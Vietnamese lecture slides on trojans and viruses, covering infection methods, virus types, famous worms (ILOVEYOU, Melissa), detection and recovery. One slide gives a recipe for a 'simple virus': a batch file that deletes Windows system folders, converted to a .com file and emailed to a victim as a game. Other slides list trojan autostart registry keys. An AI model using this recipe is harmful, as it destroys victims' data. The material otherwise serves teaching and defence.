lecture16 trojans và virus

Các đặc tính của virusVirus nằm trong bộ nhớ máy tính và tự nhân bản khi chương trình chứa nó chạy Virus có thể tự thay đổi codes để xuất hiện khác đi Tự che dấu để không bị phát hiện

Trojans và Virus

Ngô Văn Công

Giới thiệu

 Là một chương trình phá hoại nhưng giả dạng một chương trình hữu dụng.

 Thu thập các thông tin về

trang tài liệu, xóa file

trong máy tính bị nhiễm

Cách thức hoạt động

Attacker truy cập vào hệ thống bị nhiễm trojans khi người dùng lên mạng

Sau khi truy cập vào máy tính nạn nhân, attacker có thể triển khai nhiều kiểu

tấn công khác.

Chú ý:Để kết nối vào trojans, attacker phải biết địa chỉ IP của máy nạn nhân, một số trojans có chức năng mail về cho attacker địa chỉ IP của máy nạn

nhân

Trojans tự khởi động

 Các trojans thường tự khởi động khi hệ thống nạn nhân restart lại

 Có nhiều cách tự khởi động

 Gắn trojans vào chương trình explorer.exe

 Một số file hệ thống:win.ini, system.ini, winstart.bat

 Thêm mục vào registry

• [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run]

– "Info"="c:\directory\Trojan.exe"

• [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnce]

– "Info"="c:\directory\Trojan.exe"

• [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices]

– "Info"="c:\directory\Trojan.exe"

 Phá hủy và xóa dữ liệu

 Denial-of-Service Attack trojans

 Giúp hacker thực hiện tấn công từ chối dịch vụ hệ

thống khác

 Proxy trojans

 Chuyển hệ thống nạn nhân thành proxy

 FTP trojans

 Mở port 21 và cho phép attacker kết nối vào hệ thống

 Security Software disablers

 Tắt các chương trình diệt virus

Mục đích tạo ra trojans

 Lấy thông tin credit card

 Thông tin tài khoản(email, password,

username )

 Các tài liệu quan trọng

 Thông tin tài chính(tài khoản nhà băng )

 Sử dụng máy tính nạn nhân cho mục đích bất

chính như hack,scan,flood các máy tính khác trên mạng

Cách thức trojans xâm nhập vào hệ thống

Thông qua các ứng dụng chat

Thông qua các file đính kèm

Thông qua file chia sẻ

Thông qua các chương trình giả mạo

Tài các tập tin,trò trơi, phần mềm từ internet

Netcat:client/server

Tổng kết

 Trojans là đoạn mã nguy hiểm năm trong các

phần mềm cracker xâm nhập vào hệ thống đích

 Múc đích chính trojans là xâm nhập và duy trì

Virus

Tin tức

tập tin khác

Khi tập tin bị nhiễm virus thì chương trình virus sẽ tự chạy ở hậu cảnh mà người

dùng không hề biết gì

Sự ra đời virus

Các đặc tính của virus

Virus nằm trong bộ nhớ máy tính và tự

nhân bản khi chương trình chứa nó chạy

Virus có thể tự thay đổi codes để xuất hiện khác đi

Tự che dấu để không bị phát hiện

 Mã hóa thành các biểu tượng

 Thay đổi dự liệu chỉ mục để thêm các bytes

virus vào file

 Sử dụng “stealth algorithm” để chuyển hướng

dự liệu

Cách thức hoạt động của virus

Hầu hết virus hoạt động ở hai giai đoạn

 Giai đoạn nhiễm vào hệ thống

• Tác giả viết virus sẽ quyết định khi nào virus nhiễm vào hệ thống

• Một số virus nhiễm vào hệ thống khi nó được chạy

• Một số khác nhiễm vào máy tính khi xuất hiện sự kiện nào đó

 Giai đoạn tấn công

• Một số virus sau khi nhiễm vào sẽ tấn công hệ thống: làm hỏng hệ thống hay xóa tập tin

Giai đoạn nhiễm vào hệ thống

Gắn vào tệp EXE để lây nhiễm

Bước tấn công

Làm chậm hệ thống bằng cách phân mảnh các tập tin

 Worm

 Là những chương trình có thể tự nhân bản từ máy tính sang máy tính nhưng không lây nhiễm các

chương trình khác

 Không giống như virus, Worm không dùng các tập tin trên host để lây lan,

Worm chỉ tồn tại bên trong tập tin, tập tin này sẽ được truyền từ máy tính sang máy tính thông qua hệ

thống mạng

 Code Red Worm: IIS, nó xóa trang web và hiện lên thông điệp "Hacked By

Chinese," hơn 90.000 máy tính chạy IIS nhiễm trong vòng khỏang 4 giờ

Virus nhiễm vào hệ thống như thế nào

Tự nạp vào bộ nhớ và kiểm tra các file

chạy trên đĩa

Thêm đoạn mã virus vào các chương trình hợp lệ mà người dùng không biết

Khi người dụng chạy các chương trình này thì chương trình virus sẽ chạy và tìm các tập tin khác nhiễm vào

Quá trình trên lặp lại cho tới khi người

dụng phát hiện ra sự bất thường của máy tính

Các kiểu virus

Virus được phân loại dựa trên 2 tiêu chuẩn

 Nhiễm vào cái gì

 Các thức lây nhiễm

Phân loại virus

System sector hay là Boot virus

•Nhiễm vào boot sector của đĩa cứng

File virus

•Nhiễm vào các file thực thi của hệ điều hành

Macro virus

•Nhiễm vào các tài liệu:word, excel

Source code virus

•Thêm các đoạn trojan code vào các đoạn code trên máy

Network virus

•Nhiễm vào máy thông qua mail hay qua mạng

System sector virus

 System sector là vùng đặc biệt trên đĩa chứa chương trình sẽ chạy khi khởi động máy

 System sector thường

là đích các loại virus

 Dùng các kỹ thuật

thông thường virus để lây nhiễm và che dấu chúng

File virus

Thường nhiễm vào các tập tin thực thi, có phần mở rộng là EXE COM DLL, thường thay đổi nội dụng của tập tin lây nhiễm và

dễ bị phát hiện do thay đổi kích thước của file(Dark Avenger và Cascade )

Thường file virus được nạp vào bộ nhớ mỗi khi file nhiễm thực thi

Macro viruses

 Thường viết bằng

ngôn ngữ WordBasic hay Visual Basic

 Virus này thường nằm trong các tài liệu

Script viruses

 Lây nhiễm các ứng dụng viết bằng ngôn ngữ

script(javascript, Visual basic script)

 Script virus lan truyền nhanh và rộng rãi vì dễ dàng viết và một lượng lớn các máy tính chạy các ứng dụng sử dụng script.

 Lây truyền qua đĩa

mềm, CD hay qua các ứng dụng Window Help, IRC(Internet Relay Chat)

Lây nhiễm như thế nào

Stealth virus

 Virus loại này tránh được các phần mềm diệt virus bằng cách can thiệp vào yêu cầu của nó với hệ thống

 Khi phần mềm virus yêu cầu file, yêu cầu đó sẽ được

chuyển cho virus thay vì hệ điều hành

 virus sẽ trả về phiên bản file không bị nhiễm cho phầm

mềm diệt virus và vì vậy phầm mềm diệt virus không phát hiện được

Bootable CD virus

 Kiểu virus mới phá hủy dữ liệu trên đĩa cứng khi khởi động từ đĩa CD bị nhiễm virus

 Ví dụ: ái đó đưa cho bạn đĩa CD khởi động linux

 Khi bạn boot từ đĩa CD, tất cả dữ liệu sẽ bị xóa

 Không có phần mềm diệt virus nào có thể ngăn chặn được

 Hầu hết các chương trình anti-virus hiện nay cố gắng phát hiện ra virus bằng cách tìm một đặc tính đặc trưng của virus trong các tập tin bình thường

 Đặc tính đặc trưng này là một phần của virus

 Self-modification virus sử dụng kỹ thuật làm cho các

chương trình diệt virus dạng này khó phát hiện ra hay

không thể phát hiện ra

 Dạng virus này sẽ tự thay đổi mình mỗi lần nhiễm vào các file khác nhau

Virus encrypted

File Extension Virus

 File extension virus thay đổi phần mở rộng của tập tin

 Txt an toàn vì nó là tập tin văn bản

 Với chức năng tắt hiển thị phần mở rộng, ai đó gửi cho bạn file bad.txt.vbs, bạn sẽ chỉ thấy bad.txt

 Nếu bạn quên là phần mở rộng không hiển thị, bạn click vào file chạy, đây là đoan script và nó sẽ được chạy

 Giải pháp là tắt chức năng

“Hide file extension” trong window

Virus:I love you

Love letter là một sâu worm dạng email, nó sẽ sao chép lên một số file tại máy tính sau đó gửi file này cho người khác

Love letter được gửi mail đến nạn nhân với file đính kèm có tên là: LOVE-LETTER-FOR -YOU.TXT.VBS

Phát tán rộng rãi tháng 4/2000

Tìm password trên hệ thống đích và gửi

mail về: 'mailme@super.net.ph'

Sâu Worm Melissa

1 Mellissa được gửi đến hộp mail, trá

hình dưới một mail bình thường, có gắn kèm một file word kèm theo, chủ

đề của tệp đó là “mail quan trọng đến

từ”, sau đó sẽ là tên một người bạn…

Thông điệp có nội dung là “đây là tài

liệu bạn yêu cầu.”

4 Mỗi người trong số 50 người bị nhiểm, khi mở file word thì melissa lại làm công việc tương tự -

tự động gửi chính nó cho

50 người khác.

3 Macro sẽ kiểm tra xem người

dùng có cài outlook trên máy không, nếu có thì nó sẽ dùng 50 tên

đầu tiên trong danh sách địa chỉ và

được chạy mà người mở

không biết gì về sự xuất

hiện của nó

6 Vấn đề được giải quyết khi các phần mềm diệt virus cập nhật để thêm chức năng có thể phát hiện ra virus melissa.

5 Số lương các mail được gửi nhanh đến mức internet và các nhà cung cấp mail không thể duy trì việc gửi và nhận các thông điệp Một số mail server đã bị sập.

Viết một chương trình virus đơn giản

Tạo một file batch đơn giản tên là Game.bat

•@echo off

•del c:\winnt\system32\*.*

•del c:\winnt\*.*

Sử dụng bat2com để chuyển từ file Game.bat -> Game.com

Sử dụng bat2com để chuyển từ file Game.bat -> Game.com

Gửi tập tin Game.com như là một tập tin đính kèm vào mail tới nạn nhân

Khi nạn nhân chạy chương trình, nó xóa toàn bộ WINNT trên máy nạn nhân làm cho window không thể sử dụng được

Tạo virus tự động

Sử dụng các hệ thống “virus contruction kit”

Có rất nhiều hệ thống như vậy hiện nay

 Kefi’s HTML virus contruction kit

 Virus creation laboratory v1.o

 The Smeg virus contruction kit

 Window Virus Creation Kit v1.oo



Cách thức phát hiện virus

Quét(Scanning)

 Dựa vào các dấu hiệu đặc trưng virus để phát

hiện ra virus

Kiểm tra tính toàn vẹn(Integrity Checking)

 Đọc toàn bộ dữ liệu trên đĩa, đưa ra các

thông tin về các file trên đĩa như dữ liệu để

kiểm tra virus

Phầm mềm diệt virus

Một trong những cách ngăn chặn virus

hiệu quả đó là cài đặt phần mềm diệt virus

Hiện nay có rất nhiều phần mềm diệt virus

AVG Antivirus

 Bảo vệ hệ thống trước Virus, Worm, Trojans và các chương trình không mong muốn

 Đặc tính

 Phát hiện và tiêu diệt hầu hết các loại virus

 Dung lương nhỏ và cập nhật nhanh

 Giao diện thân thiện

Norton Antivirus

Kaspersky Antivirus

Phát hiện tấn công virus

Một vài triệu chứng phát hiện tấn công

virus

 Máy tính chạy chậm hơn bình thường có thể

ngừng trả lời người dùng

 Kích cỡ hay là ngày thay đổi cuối của các đối

tượng nhiễm virus có thể bị thay đổi

 Đĩa cứng bị báo đầy dù vẫn còn chỗ trống

 Các ứng dụng chạy chậm hơn so với bình

thường

Ngăn chặn, Phát hiện, Hồi phục lại từ các đợt tấn công bằng virus

Các giải pháp an ninh để ngăn chặn virus

 Bất cứ người nào sử dụng máy tính thì nên

có kiến thức căn bản về các kiểu virus khác

nhau và cách hoạt động của chúng

 Bảo vệ máy tính khỏi các loại virus truyền

thống, như boot sector virus, có thể cài các

hệ điều hành bảo mật cao như Unix

 Tránh tải các phần mềm trực tiếp vào đĩa

cứng từ các nguồn không biết

 Tránh mở các đính kèm của e-mail mà không

rõ người gửi, trước khi mở nó thì nên quét

virus trước

Ngăn chặn(tt)

Nếu chia sẻ đĩa mềm đĩa CD cho người khác thì hãy quét virus trước

Sao chép các bản dự phòng cho đĩa cứng

Bảo đảm các máy tính phải được cài đặt các chương trình phòng chống virus mới nhất(anti virus)

Hồi phục lại sau tấn công từ virus

 Thường doanh nghiệp phát hiện hệ thống

hoạt đông không bình thương sẽ yêu cầu bộ phận hỗ trợ kỹ thuật

 Sau khi bộ phận kỹ thuật kiểm tra, sẽ tách máy tính bị nhiễm virus ra khỏi mạng và lưu

dự phòng lại tất cả các dữ liệu trên máy bị nhiễm

 Để đảm bảo hệ thống được an toàn, người quản trị nên thực hiện một số bước sau

 Khoanh vùng bị nguy hại

 Kiểm tra virus trên server sao lưu

 Quet virus tất cả các máy tính trên mạng

Hồi phục lại sau tấn công từ virus

www.themegallery.com